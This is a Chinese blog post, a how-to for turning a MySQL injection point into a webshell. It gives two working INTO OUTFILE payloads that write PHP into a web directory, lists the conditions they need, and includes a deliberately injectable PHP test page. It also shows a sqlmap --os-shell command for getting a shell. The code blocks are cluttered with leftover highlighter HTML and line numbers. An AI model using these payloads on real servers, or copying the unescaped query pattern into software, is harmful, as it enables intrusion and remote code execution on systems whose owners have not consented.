iami233
iami233
文章175
标签37
分类4
回到首页
文章归档
关于我
留言板
友人帐

文章分类

文章归档

© 2024 iami233 Powered by Hexo
Theme & RSS & Sitemap
MySQL注入两种写入一句话快速拿Webshell的方法

MySQL注入两种写入一句话快速拿Webshell的方法

2017年08月31日 技术 约 3.7k 字 大概 22 分钟

利用需要满足以下条件:

  1. root权限
  2. GPC关闭(能使用单引号)
  3. 有绝对路径(读文件可以不用,写文件必须)
  4. 没有配置–secure-file-priv

1.union

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
    <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
        <tbody>
            <tr class="crayon-row">
                <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
                        <div class="crayon-num" data-line="crayon-59a43f023b0b0450187454-1" style="margin:0px;padding:0px;list-style:none;">
                            1
                        </div>
                    </div>
                </td>
                <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
                        <div id="crayon-59a43f023b0b0450187454-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-i">id</span><span class="crayon-o">=</span><span class="crayon-cn">2</span><span class="crayon-sy">)</span> <span class="crayon-e">union </span><span class="crayon-i">select</span> <span class="crayon-cn">1</span><span class="crayon-sy">,</span><span class="crayon-cn">2</span><span class="crayon-sy">,</span><span class="crayon-cn">3</span><span class="crayon-sy">,</span><span class="crayon-cn">4</span><span class="crayon-sy">,</span><span class="crayon-cn">5</span><span class="crayon-sy">,</span><span class="crayon-cn">6</span><span class="crayon-sy">,</span><span class="crayon-cn">7</span><span class="crayon-sy">,</span>'<span class="crayon-ta"><?</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> <span class="crayon-ta">?></span><span class="crayon-e">into </span><span class="crayon-i">outfile</span><span class="crayon-o">/</span><span class="crayon-i">home</span><span class="crayon-o">/</span><span class="crayon-i">wwwroot</span><span class="crayon-o">/</span><span class="crayon-i">lu4n</span><span class="crayon-sy">.</span><span class="crayon-i">com</span><span class="crayon-o">/</span><span class="crayon-i">luan_phpinfo</span><span class="crayon-sy">.</span><span class="crayon-i">php</span><span class="crayon-o">%</span><span class="crayon-cn">23</span>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
</div>

<? phpinfo(); ?>为写入的内容可添加自己的一句话  /home/wwwroot/5ime.cn/luan_phpinfo.php 为已存在的网站目录下的文件即插入文件名

2.no union

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
    <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
        <tbody>
            <tr class="crayon-row">
                <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
                        <div class="crayon-num" data-line="crayon-59a43f023b0b8247295740-1" style="margin:0px;padding:0px;list-style:none;">
                            1
                        </div>
                    </div>
                </td>
                <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
                        <div id="crayon-59a43f023b0b8247295740-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-i">id</span><span class="crayon-o">=</span><span class="crayon-cn">2</span><span class="crayon-sy">)</span> <span class="crayon-e">into </span><span class="crayon-i">outfile</span><span class="crayon-o">/</span><span class="crayon-i">home</span><span class="crayon-o">/</span><span class="crayon-i">wwwroot</span><span class="crayon-o">/</span><span class="crayon-i">lu4n</span><span class="crayon-sy">.</span><span class="crayon-i">com</span><span class="crayon-o">/</span><span class="crayon-i">luan_phpinfo</span><span class="crayon-sy">.</span><span class="crayon-i">php</span><span class="crayon-e">fields</span> <span class="crayon-e">terminated</span> <span class="crayon-e">by</span><span class="crayon-ta"><?</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> <span class="crayon-ta">?></span><span class="crayon-o">%</span><span class="crayon-cn">23</span>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
</div>

第二种方法最早最早是在吐司的一个 2015-1-24 的帖子里看到的,吐司果然大牛多。 效果如下:

Webshell

这里用的第二种方法是通过插入分隔符号来getshell的,所以必须查询结果有多个列 一般情况下的注入点都是符合条件的。

sqlmap利用方法

luan_test.php 为例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
</div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
    <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
        <tbody>
            <tr class="crayon-row">
                <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-1" style="margin:0px;padding:0px;list-style:none;">
                            1
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-2" style="margin:0px;padding:0px;list-style:none;">
                            2
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-3" style="margin:0px;padding:0px;list-style:none;">
                            3
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-4" style="margin:0px;padding:0px;list-style:none;">
                            4
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-5" style="margin:0px;padding:0px;list-style:none;">
                            5
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-6" style="margin:0px;padding:0px;list-style:none;">
                            6
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-7" style="margin:0px;padding:0px;list-style:none;">
                            7
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-8" style="margin:0px;padding:0px;list-style:none;">
                            8
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-9" style="margin:0px;padding:0px;list-style:none;">
                            9
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-10" style="margin:0px;padding:0px;list-style:none;">
                            10
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-11" style="margin:0px;padding:0px;list-style:none;">
                            11
                        </div>
                    </div>
                </td>
                <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
                        <div id="crayon-59a43f023b0bc142086430-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-ta"><?php</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-2" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-sy">@</span><span class="crayon-v">$link</span><span class="crayon-o">=</span> <span class="crayon-e">mysql_connect</span><span class="crayon-sy">(</span><span class="crayon-s">"localhost"</span><span class="crayon-sy">,</span><span class="crayon-s">"root"</span><span class="crayon-sy">,</span><span class="crayon-s">""</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-3" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-e">mysql_select_db</span><span class="crayon-sy">(</span><span class="crayon-s">"mysql"</span><span class="crayon-sy">,</span><span class="crayon-v">$link</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-4" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-v">$user</span> <span class="crayon-o">=</span> <span class="crayon-e">strtolower</span><span class="crayon-sy">(</span><span class="crayon-v">$_GET</span><span class="crayon-sy">[</span><span class="crayon-s">'user'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-5" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-st">if</span><span class="crayon-sy">(</span><span class="crayon-e">strpos</span><span class="crayon-sy">(</span><span class="crayon-v">$user</span><span class="crayon-sy">,</span><span class="crayon-s">"union"</span><span class="crayon-sy">)</span> <span class="crayon-o">===</span> <span class="crayon-t">false</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-6" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-v">$sql</span><span class="crayon-o">=</span> <span class="crayon-s">"SELECT * FROM user where user='{$user}'"</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-7" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-k ">echo</span> <span class="crayon-v">$sql</span> <span class="crayon-sy">.</span> <span class="crayon-s">'<br>'</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-8" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-e">mysql_query</span><span class="crayon-sy">(</span><span class="crayon-v">$sql</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-9" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-k ">echo</span> <span class="crayon-e">mysql_errno</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span> <span class="crayon-sy">.</span> <span class="crayon-s">": "</span> <span class="crayon-sy">.</span> <span class="crayon-e">mysql_error</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span> <span class="crayon-s">" "</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-10" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-sy">}</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-11" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-ta">?></span>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
</div>

经测试,sqlmap 最新版实际是支持这个方法的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
    <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
        <tbody>
            <tr class="crayon-row">
                <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
                        <div class="crayon-num" data-line="crayon-59a43f023b0be210058938-1" style="margin:0px;padding:0px;list-style:none;">
                            1
                        </div>
                    </div>
                </td>
                <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
                        <div id="crayon-59a43f023b0be210058938-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-v">C</span><span class="crayon-o">:</span><span class="crayon-sy">\</span><span class="crayon-v">luan</span><span class="crayon-sy">\</span><span class="crayon-v">sqlmap</span><span class="crayon-o">></span><span class="crayon-e">python </span><span class="crayon-v">sqlmap</span><span class="crayon-e">.py</span> <span class="crayon-o">-</span><span class="crayon-i">u</span><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-o">/</span><span class="crayon-o">/</span><span class="crayon-cn">192.168.2.200</span><span class="crayon-o">/</span><span class="crayon-v">luan_test</span><span class="crayon-e">.php</span><span class="crayon-sy">?</span><span class="crayon-v">user</span><span class="crayon-o">=</span><span class="crayon-i">root</span>” –<span class="crayon-v">os</span><span class="crayon-o">-</span><span class="crayon-v">shell</span>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
</div>

Webshell
Webshell

但是,如果–os-shell用不了,sqlmap有个写文件的选项,经测试不成功,也就是说,sqlmap只能传自己的webshell。

Webshell

Webshell

如果工具党遇到这种情况,直接使用sqlmap –os-shell然后用sqlmap上传的Webshell来操作就可以了。

本文作者:iami233
本文链接:https://5ime.cn/webshell.html
版权声明:本文采用 CC BY-NC-SA 3.0 CN 协议进行许可
×